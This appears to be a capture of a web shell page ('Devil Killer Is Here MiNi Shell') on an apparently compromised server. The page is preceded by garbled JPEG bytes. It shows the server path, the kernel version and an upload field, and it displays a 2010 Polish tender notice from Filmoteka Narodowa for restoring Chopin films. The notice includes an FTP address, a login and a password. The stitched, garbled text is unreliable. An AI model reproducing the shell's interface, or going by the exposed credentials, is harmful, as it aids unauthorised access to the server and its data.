JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20100310/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20100310/52889-N-2010.html

<p class="kh_header"><b>Warszawa: PRZYGOTOWANIE MATERIAŁÓW AUDIOWIZUALNYCH DO PUBLIKACJI FILMOWY CHOPIN: KOREKCJA OBRAZU I DŹWIĘKU.</b><br>
<b>Numer ogłoszenia: 52889 - 2010; data zamieszczenia: 10.03.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Filmoteka Narodowa , ul. Puławska 61, 00-975 Warszawa, woj. mazowieckie, tel. 022 8455074, faks 022 540 83 33.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> http://www.fn.org.pl</li><li><b>Adres strony internetowej, pod którym dostępne są informacje dotyczące dynamicznego systemu zakupów:</b> nie dotyczy</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Państwowa instytucja kultury.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> PRZYGOTOWANIE MATERIAŁÓW AUDIOWIZUALNYCH DO PUBLIKACJI FILMOWY CHOPIN: KOREKCJA OBRAZU I DŹWIĘKU..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest:
1. PRZYGOTOWANIE MATERIAŁÓW AUDIOWIZUALNYCH DO PUBLIKACJI FILMOWY CHOPIN: KOREKCJA OBRAZU I DŹWIĘKU w określonym zakresie pod nadzorem Zamawiającego

Materiał nr 1 - Młodość Chopina, Kaseta HDCAM SR - obraz, plik wave na nośniku optycznym - dźwięk.
Czas: 02:07:18

Stan zachowania obrazu.
a)	Niestabilność: 
Ogólnie obraz dość stabilny, ale na większości sklejek pojawia się skok, szczególnie drażniące są skoki wewnątrz ujęcia (sklejka z powodu ubytku klatek) - i koniecznie wymagają stabilizacji.
b)	Zaśnieżenie: 
Duże, w ok. 80% jasne. Wzmożone na początkach i końcach aktów.
c)	Plamy:
Pojedyncze małe, średniej wielkości plamy, nietypowe ciemne, przeźroczyste, słabo widoczne  plamy (opis w załączniku nr 7 do SIWZ).
d)	Sklejki:
Główną wadą sklejek w całym filmie jest destabilizacja obrazu w ich rejonie. Pojawiają się także błyski ślady kleju i zniekształcenia obrazu w obrębie podklejenia.
e)	Rysy stałe:
Występują w aktach: 1,2,4-6,8-13 (opis w załączniku nr 7 do SIWZ).
f)	Rysy na pojedynczych klatkach:
Występują wraz z ogólnym zaśnieżeniem.
g)	Znaki końca aktu:
Występują w aktach 1-12 (opis w załączniku nr 7 do SIWZ).

Oczekiwany zakres korekcji obrazu.
Stabilizacja obrazu w obrębie sklejek, wyczyszczenie przekopiowanych śladów po sklejkach. Usunięcie dużych zaplamień (o szerokości i/lub wysokości większej niż 50 pikseli na obrazie HD), znaków końca aktu. Usunięcie głębokich, stałych rys (patrz pkt. e i załącznik nr 7 do SIWZ).

Oczekiwany zakres korekcji dźwięku.
Korekcja szumów i trzasków. Korekcja anomalii i ewentualnych zniekształceń po kontroli ścieżki w zakresie poziomów i powrót do właściwej wysokości dźwięku. Synchronizacja z dostarczoną kopią obrazu, zmiana prędkości dźwięku z 24 na 25 klatek na sekundę.

Materiał nr 2 - Mazurki Chopina, cz-b., Kaseta HDCAM SR - obraz, plik wave na nośniku optycznym - dźwięk.
Czas: 00:11:51
Stan zachowania obrazu.
a)	Niestabilność: 
Na całym filmie obraz drży, podskakuje na sklejkach.
b)	Zaśnieżenie:
Białe zabrudzenia, kurz i poziome drobne rysy.
c)	Plamy:
10:02:48:00 Sporadycznie pojawia się pionowa, ciemna plama na środku obrazu.
10:02:49:00 Duże, ciemne plamy na środku obrazu na kilkunastu klatkach, aż do 10:03:04:00.
10:04:57:00 Większa plama. 
10:08:82:00 Delikatne drobne zaplamienia w lewym górnym rogu. 
10:10:51:00 Duża plama na środku obrazu.
d)	Sklejki:
Na sklejkach pojawiają się błyski, wzmożenie białych zabrudzeń i drobne rys, zdarzają się w sklejkach wklejone ciemne klatki. Występują sklejki wewnątrz ujęć (opis w załączniku nr 7 do SIWZ).
e)	Rysy stałe:
10:01:11:00 Biała rysa na 3/4 obrazu.
10:01:11:00 Pionowe wyraźne białe rysy na kilka klatek.
10:02:17:00 - 10:02:20:00 Pionowe wyraźne białe rysy na kilka klatek.
10:02:40:00 Pozioma stała rysa na środku obrazu, oraz rysa przejściowa na 2/3 obrazu.
10:03:16:00 Kilka ruchliwych rys na 3/4 obrazu i na prawej krawędzi; 10:03:20:00 stała ciemna cienka rysa na 2/3 obrazu. 
10:04:11:00 Pojawia się biała rysa z prawej strony aż do 10:04:42:00. 
10:07:18:00 Ponownie pojawia się biała, stała rysa z prawej strony obrazu.
10:07:29:00 Jasna szeroka linia, cienka biała rysa na prawo od środka obrazu. 
10:09:12:00 Ciemna cienka stała rysa z lewej i na środku (ta zanika na 10:09:18:00)  obrazu przez całe ujęcie. 
10:10:24:00  Stałe rysy gł. z prawej strony jasne i ciemne przez całe ujecie. 
10:11:00:00 Stała podzielona na części jasna rysa przy prawej krawędzi.
f)	 Rysy na pojedynczej klatce:
Cały film zadeszczony, rysy różnej grubości, głębokości.
10:01:11:00; 10:02:17:00- 10:02:20:00; 10:02:22:00.
10:04:52:00 Wzmożenie zadeszczeń, rysy na kilka klatek, gruba rysa z lewej strony.
10:05:22:00 Dużo zarysowań skośnych, plamy, rysy koncentrują się na ujęciu z prawej strony obrazu.
10:06:33:00 - 10:07:18:00 Dużo białych rys, plamy, rysy koncentrują się z prawej strony obrazu, pojawiają się również skośne. 
10:07:59:00 Białe zarysowania po prawej stronie obrazu.
10:08:15:00; 10:08:26:00; 10:10:17:00 Wzmożenie białych zabrudzeń kurz i poziome i pionowe drobne rysy, pionowe wyraźne białe rysy na kilka klatek, skośne rysy, włosy.
10:08:37:00 Ciemna cienka stała rysa na środku obrazu przez całe ujęcie, biała na kilka klatek z lewej strony.
g)	Znaki końca aktu:
Brak.
h)	Dodatkowe uwagi:
Niestabilność luminancji spowodowana też migoczącym zaświetleniem z prawej strony obrazu  błyski całej klatki. (opis w załączniku nr 7 do SIWZ).

Stan zachowania dźwięku.

Szum ścieżki na średnim poziomie. Oryginałem są prawdopodobnie zmontowane fragmenty zapisu optycznego. Dlatego poszczególne części (kolejne utwory i komentarz lektora) mają inna barwę, którą trzeba ujednolicić. Nie ma trzasków i wyraźnych szumów obwiedniowych, ale za to jest kilkanaście głuchych uderzeń pochodzących z włączania i wyłączania główki odtwarzającej. 
Skoki dźwiękowe w trakcie utworów muzycznych - prawdopodobnie ścieżka ma drobne ubytki (kilka) w długości. Konieczność dosynchronizowania z obrazem. Pasmo przenoszenia  i ogólna barwa dźwięku jak w Recitalu Chopina w Dusznikach.

Oczekiwany zakres korekcji obrazu.

Stabilizacja obrazu, wyczyszczenie przekopiowanych śladów po sklejkach i usunięcie wklejonych ciemnych klatek. Wyczyszczenie największych zaplamień (o szerokości i/lub wysokości większej niż 50 pikseli na obrazie HD).

Oczekiwany zakres korekcji dźwięku.

Korekcja szumów i ujednolicenie barwy dźwięku. Kontrola ścieżki w zakresie poziomów - korekcja anomalii i zniekształceń powstałych w wyniku uszkodzeń mechanicznych ścieżki optycznej. Usunięcie głuchych uderzeń pochodzących z włączania i wyłączania główki odtwarzającej. Synchronizacja z dostarczoną kopią obrazu, zmiana prędkości dźwięku z 24 na 25 klatek na sekundę i powrót do właściwej wysokości dźwięku.

Materiał nr 3 - Recital Chopina w Dusznikach, cz-b, kaseta HDCAM SR - obraz, plik wave na nośniku optycznym - dźwięk.
Czas: 00:12:27

Stan zachowania obrazu:

a)	Niestabilność:
Cały film niestabilny, obraz drży, szczególna niestabilność na sklejkach.
b)	Zaśnieżenie:
Duże zaśnieżenie obrazu za równo jasne i ciemne plamki różnej wielkości.
c)	Większe plamy:
Od początku do 10:00:37:00 tablice początkowe: ciemne plamy, wyraźne na białych napisach. 
10:02:33:00 ciemne plamy układające się w łuk.
10:08:56:00 Całe ujęcie mocno zaśnieżone, białe plamy.
d)	Sklejki:
Skoki na sklejkach, również wewnątrz ujęć, białe przekopiowane ślady kleju.  
np. 10:00:55:00, zdarzają się w sklejkach wklejone ciemne klatki.
e)	Rysy stałe:
Cały film w delikatnych zadeszczeniach ponadto okresowo głębokie stałe rysy. 
10:00:40:00 -10:00:56:00 Liczne białe rysy drobne i szerokie, zaśnieżenie ciemne i jasne.
10:02:52:00 Biała ruchliwa rysa na 3/4 obrazu z prawej do 10:03:00:00.
10:03:10:00 - 10:03:21:00 jasne stałe krótkie rysy i długie rysy pojawiające się 
i zanikające. 
10:00:56:00 - 10:02:32:00 Delikatne ciemne i jasne rysy drobne i szerokie, zaśnieżenie ciemne i jasne. 
10:02:40:00 Pojawiają się na ujęciu białe rysy na kilka klatek. 
10:02:52:00 Biała ruchliwa rysa na 3/4 obrazu z prawej do 10:03:00:00;10:03:21:02 biała rysa na lewo od środka obrazu na kilka klatek drobne ciemne ryski przez całe ujęcie.
10:03:38:00 Biała rysa na lewo od środka obrazu na kilka klatek. 
10:04:04:00 Delikatne ciemne rysy utrzymują się, biała rysa po lewej stronie obrazu . 10:05:12:00, 10:05:17:00, 10:05:20:00 itd. 
Pojawia się szeroka biała rysa na kilka klatek aż do 10:05:30:00. 
10:05:39:00, 10:06:38:00  i kolejno co kilkadziesiąt klatek aż do 10:07:30:00.
10:07:09:00 Biała cienka rysa 1/3 obrazu, od 10:07:18:00 z lewej obok niej druga zanikająca i zadeszczenie wzmaga się.
10:07:39:00 Pojawia się szeroka biała rysa z prawej, nieco delikatniejsza na kilka klatek aż do10:07:40:00. 
10:10:27:00 pojawia się biała rysa zanikająca.

f)	 Rysy na pojedynczej klatce:
występują wraz z ogólnym zaśnieżeniem.

g)	Znaki końca aktu: brak.

i)	Dodatkowe uwagi:
Obraz bardzo zniszczony, skoki luminancji (np. 10:09:57:00 nagłe ściemnienie), ciemne klatki,  drobne białe zaśnieżenie i zarysowania szczególnie gęste na początku i końcu filmu oraz w przenikach pomiędzy ujęciami. Rzadziej pojawiają się również ciemne plamy. Ponadto na obrazie widać wyraźnie ślady sklejek, przekopiowane szerokie białe plamy przekopiowanego kleju. 

Stan zachowania dźwięku.
Stan dźwięku zły - mimo, że obecnie zapisany jest na nośniku magnetycznym 35 mm, jest prawdopodobnie kopią z zapisu optycznego, a pierwotnym źródłem muzyki mogła być płyta gramofonowa, z której przygotowano playback. Stąd kilka rodzajów uszkodzeń i szumów:
a)	szum taśmy, słyszalny w całym paśmie. 
b)	szum związany z zapisem poszczególnych dźwięków, który tworzy obwiednię  uderzeń w fortepian. 
c)	pojedyncze trzaski, pochodzące z płyty gramofonowej i zniszczonej ścieżki optycznej. 
d)	głuche uderzenia na początku i końcu zapisu, z powodu włączenie i wyłączenie odtwarzania ze ścieżki optycznej. 
Pasmo przenoszenia dźwięku użytecznego jest ograniczone do możliwości zapisu optycznego na poziomie przełomu lat 40. i 50. poprzedniego wieku. Oznacza to brak częstotliwości powyżej 7 kHz, podbitą średnicę w okolicy 3 - 3,5 kHz i brak częstotliwości poniżej 100 - 200 Hz.

Oczekiwany zakres korekcji obrazu.
Stabilizacja obrazu stabilizacja luminancji, wyczyszczenie przekopiowanych śladów po sklejkach, rozdarcia i największych zaplamień (o szerokości i/lub wysokości większej niż 50 pikseli na obrazie HD). Usunięcie szerokiej białej rysy pojawiającej się z prawej strony klatki, wielokrotnie na kilku klatkach. 

Oczekiwany zakres korekcji dźwięku.
Korekcja szumów: usunięcie szumu taśmy, złagodzenie szumów obwiedniowych na dźwiękach fortepianu. 
Usunięcie trzasków pochodzących z płyty gramofonowej i ubytków na ścieżce optycznej. Korekcja zniekształceń na początku i końcu zapisu, powstałych w wyniku włączenia 
i wyłączenia ścieżki optycznej. Kontrola ścieżki w zakresie poziomów - korekcja anomalii 
i ewentualnych zniekształceń w możliwym zakresie.
Synchronizacja z dostarczoną kopią obrazu, zmiana prędkości dźwięku z 24 na 25 klatek na sekundę i powrót do właściwej wysokości dźwięku.

Materiał nr 4 - Chopin w Paryżu, cz-b, Kaseta HDCAM SR - obraz, plik wave na nośniku optycznym - dźwięk.
Czas: 00:11:28

Stan zachowania obrazu.
a)	Niestabilność:
wyraźna niestabilność obrazu - wymaga całościowej stabilizacji
b)	Zaśnieżenie:
lekkie zaśnieżenie na całym filmie: pojawiające się białe ślady kurzu. Plamki są przeważnie małych rozmiarów o małym i średnim natężeniu.
c)	Plamy:
Brak dużych plam. 
d)	Sklejki:
Sklejki mało widoczne, ale do przeglądnięcia pod kątem jakości.
e)	Rysy stałe:
Nie występują.
f)	Rysy na pojedynczej klatce:
Występują bardzo rzadko, drobne.
g)	Znaki końca aktu:
Nie występują.

Stan zachowania dźwięku.
Szum na średnim poziomie, słyszalne zniekształcenia i przesterowania na dźwiękach silniejszych i wysokich. Zniekształcenia pojawiają się wraz z dźwiękami. W drugiej części filmu szum jest zdecydowanie mocniejszy i pojawiają się trzaski z płyty lub nośnika światłoczułego. 
Oczekiwany zakres korekcji obrazu.
Stabilizacja całości filmu, przegląd pod kątem gorzej zachowanych sklejek i skorygowanie ich.

Oczekiwany zakres korekcji dźwięku.
Usunięcie szumów i trzasków. Korekcja przesterowań w możliwym zakresie oraz korekcja dźwięku na wysokich i mocniejszych dźwiękach fortepianu.
Synchronizacja z dostarczoną kopia obrazu, zmiana prędkości dźwięku z 24 na 25 klatek na sekundę i powrót do właściwej wysokości dźwięku.

Materiał nr 5 - Rodem warszawianin, kol i cz-b, Kaseta HDCAM SR- obraz, plik wave na nośniku optycznym - dźwięk.
Czas: 00:56:00.

Stan zachowania obrazu
Materiały archiwalne, szczególnie przedwojenne charakteryzuje duża ilość zniszczeń. Materiał współczesny dość czysty ale występują znaki końca aktu (opis w załączniku nr 7 do SIWZ).

Stan zachowania dźwięku
Film współczesny, ogólny szum ścieżki jest nieznaczny. 
Stan materiałów archiwalnych różnej jakości - w brzmieniu i charakterze towarzyszących dźwiękowi usterek.

Akt I , nagranie Umińskiego: zwiększony szum i trzaski.
Materiały z konkursu przedwojennego z J. Ekierem, J. Zakiem i R. Tamachiną: szumy obwiedniowe na każdym dźwięku fortepianu. 

Akt II,  Archiwalia z 1949 r.: duży szum i pojedyncze trzaski, pojawia się niski przydźwięk o charakterze elektrycznym. Szum i trzaski możliwe do usunięcia towarzyszą nagraniom H. Czerny - Stefańskiej i B. Dawidowicz. W piątym konkursie pojawia się zniekształcenie przed etiudą rewolucyjną, a potem duże trzaski i szumy na nagraniach Kiyoko Tanace, które jeszcze powiększają się (nagranie A. Harasiewicz).

Akt III, szumy i trzaski podobne do pozostałych materiałów archiwalnych, barwa i rodzaj zniekształceń zmienia się na każdym występie.

Akt IV, jakość nagrań stopniowo się poprawia, wyjątek stanowi występ P. Palecznego, prawdopodobnie już remasterowany. Na nagraniu D. Joffe słyszalne zniekształcenia i przesterowania, nietypowy szum na materiałach z Warszawy lat 80-tych.

Akt V, występ Dang Thai Sona pojawia się szum pulsujący. Późniejsze nagrania dobrej jakości, szum standardowy i pojedyncze trzaski. 

Akt VI, niski zakres szumów, wyjątek stanowi nagranie M. Lisak  - pojawia się dodatkowy szum z trzaskami i wysoką składową harmoniczną.

Oczekiwany zakres korekcji obrazu
Korekcja nabytych wad na materiale filmowych - znaki końca aktu (opis w załączniku nr 7 do SIWZ); materiały archiwalne nie podlegają korekcji.

Oczekiwany zakres korekcji dźwięku
a.	Usunięcie zaszumień i trzasków - ogólne. 
b.	Indywidualna pracy nad każdym fragmentem - usunięcie zaszumień i trzasków oraz korekcja wymienionych wyżej zniekształceń.
c.	Synchronizacja z dostarczoną kopią obrazu, zmiana prędkości dźwięku z 24 na 25 klatek na sekundę i powrót do właściwej wysokości dźwięku.


Dotyczy wszystkich elementów zamówienia:

2. Korekcja obrazu powinna odbyć się z należytą starannością by nie doprowadzić do powstania cyfrowych artefaktów i innych dodanych zniekształceń. Proces korekcji nie powinien zmieniać znacząco gradacji tonalnej filmu (film był poddany korekcji gęstościowej).

3 Eksport obrazu do sekwencji klatek w formacie TIFF lub DPX w rozdzielczości HD.

4 Synchronizacja zremasterowanego pliku dźwiękowego w formacie wave z obrazem. 

4.1 Dostarczona sekwencja obrazów powinna być synchroniczna i mieć zgodny czas trwania (początek i koniec) z dostarczonym plikiem dźwiękowym.

4.2 Dodatkowo wykonać plik wideo, referencyjny (preview w rozdzielczości PAL) dla przedstawienia osiągniętego synchronu.

5 Zapisanie wyników prac korekcyjnych na dysk: Zapis na dyskach SATA 1TB 
w ilości nie mniej niż 9 szt. 

5.1 Specyfikacja nośników danych: dyski SATA II cache min 32MB, o niezawodności MTBF min. 1 200 000 godzin do zastosowań macierzowych, nowe, z gwarancją producenta na co najmniej trzy lata.

6. Wykonawca  jest  zobowiązany  do  złożenia materiału filmowego poddanego korekcji na nośniku DVD w formacie Quick time w rozdzielczości HD kodowanego koderem Apple Pro Res 422 25p (preferowane) lub w formie sekwencji plików TIFF w rozdzielczości HD.

Próbka materiału, który powinien zostać poddany obróbce stanowi załącznik nr 9 do SIWZ. Zamawiający wybrał fragment zawierający stosunkowo większą ilość zniszczeń do średniej jakości filmów przewidzianych w zamówieniu i przedstawiający większy zakres korekcji.

Zamawiający zweryfikuje dokonaną przez Wykonawcę korekcję obrazu na wybranym fragmencie filmu Recital Chopina w Dusznikach.  Materiał filmowy w postaci sekwencji klatek TIFF w formacie HD znajduje się na serwerze Filmoteki Narodowej oraz jest do pobrania w Sekretariacie na płycie DVD - Załącznik nr 9 do SIWZ.

Informacje dot. serwera ftp:

adres: 213.77.42.178
login: fn19
haslo: h0sEEgL1dH

Umieszczone w katalogu filmowy.chopin
spakowane w formacie rar podzielonego na woluminy o wielkości 50mb z dołączonymi danymi naprawczymi.
Dołączony plik sfv z sumami kontrolnymi woluminów rar.

Korekcja obrazu na testowym materiale winna obejmować zawarte w specyfikacji elementy takie jak: stabilizację, usunięcie zaśnieżeń i plam, zniekształceń w obrębie sklejek i stałych rys. 

Wykonawca zobowiąże się w umowie do wykonania korekcji na poziomie adekwatnym oraz wg zakresu zawartego w opisie przedmiotu zamówienia i Załączniku nr 7 do SIWZ  na całości materiału filmowego będącym przedmiotem zamówienia.

7. W przypadku wykonywania prac poza Warszawą, Wykonawca jest zobowiązany do pokrycia kosztów dojazdu oraz noclegu osób nadzorujących proces korekcji ze strony Zamawiającego. 

Dojazdy i noclegi powinny zostać zapewnione w standardzie nie gorszym niż przewidziane dla delegacji służbowych tj. dojazd pociągiem II klasa lub przelot klasą ekonomiczną, zakwaterowanie w hotelu trzygwiazdkowym..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 92.10.00.00-2, 92.11.00.00-5.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w dniach: 56.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Nie dotyczy.</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>1. O udzielenie zamówienia mogą ubiegać się wykonawcy, którzy spełniają warunki, dotyczące: 
a) posiadania uprawnień do wykonywania określonej działalności lub  czynności, jeżeli  przepisy prawa nakładają obowiązek ich posiadania; 
b) posiadania wiedzy i doświadczenia; 
c) dysponowania odpowiednim potencjałem technicznym oraz osobami zdolnymi do wykonania zamówienia; 
d) sytuacji ekonomicznej i finansowej.  

2. Ocena spełnienia warunków udziału w postępowaniu nastąpi na podstawie przedstawionych przez Wykonawcę dokumentów i oświadczeń.

Ocena spełnienia wyżej określonych warunków odbędzie się wg formuły: spełnia - nie spełnia. Nie spełnienie chociażby jednego warunku udziału w postępowaniu skutkować będzie wykluczeniem Wykonawcy z postępowania.

Dokumenty powinny zostać dostarczone w formie oryginału lub kserokopii poświadczonej przez Wykonawcę za zgodność z oryginałem. Wykonawcy składają oświadczenia wyłącznie w formie oryginału.

3. Za spełniających warunki udziału w postępowaniu Zamawiający uzna Wykonawców, którzy złożą oświadczenie o spełnianiu warunków udziału w postępowaniu oraz:

- wykażą, iż w ciągu ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie - należycie zrealizowali co najmniej trzy usługi obejmujące cyfrową korekcję materiału video lub audio o wartości nie mniejszej niż  60 000 zł brutto każda.

4. Wykonawca jest zobowiązany wykazać odpowiednio, nie później niż na dzień składania ofert, spełnianie warunków, o których mowa powyżej oraz  brak podstaw do wykluczenia z powodu niespełniania warunków, o których mowa w art. 24 ust. 1 PZP - lista dokumentów potwierdzających brak podstaw do wykluczenia z postępowania zawarta została w pkt. 6.2 SIWZ.

5. Wykonawca może polegać na wiedzy i doświadczeniu, potencjale technicznym, osobach zdolnych do wykonania zamówienia lub zdolnościach finansowych innych podmiotów, niezależnie od charakteru prawnego łączących go z nimi stosunków. Wykonawca w takiej sytuacji zobowiązany jest udowodnić Zamawiającemu, iż będzie dysponował zasobami niezbędnymi do realizacji zamówienia, w szczególności przedstawiając w tym celu pisemne zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonywaniu zamówienia.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

